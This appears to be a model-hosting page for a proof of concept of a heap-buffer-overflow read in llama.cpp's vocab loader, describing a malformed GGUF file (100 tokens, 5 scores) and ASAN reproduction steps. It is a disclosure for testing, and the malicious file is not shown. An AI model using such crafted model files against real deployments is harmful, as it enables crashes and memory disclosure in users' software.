You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

llama.cpp Vocab OOB Read PoC

Proof of concept for heap-buffer-overflow read in llama.cpp vocab loading.

Vulnerability: llama-vocab.cpp:2128 reads scores[] and toktypes[] arrays using indices up to n_tokens without validating array sizes match.

File: poc_vocab_oob.gguf (1,715 bytes) — 100 tokens, only 5 scores

Reproduce:

git clone https://github.com/ggml-org/llama.cpp && cd llama.cpp
mkdir build && cd build
cmake .. -DCMAKE_BUILD_TYPE=Debug -DCMAKE_C_FLAGS="-fsanitize=address" -DCMAKE_CXX_FLAGS="-fsanitize=address"
cmake --build . --target llama-tokenize -j$(nproc)
./bin/llama-tokenize -m poc_vocab_oob.gguf -p "hello"

Expected: ASAN reports heap-buffer-overflow at llama-vocab.cpp:2128

Downloads last month: 8

GGUF

Model size

0 params

Architecture

llama

Hardware compatibility

We're not able to determine the quantization variants.

View all variants

Inference Providers NEW

This model isn't deployed by any Inference Provider. 🙋 Ask for provider support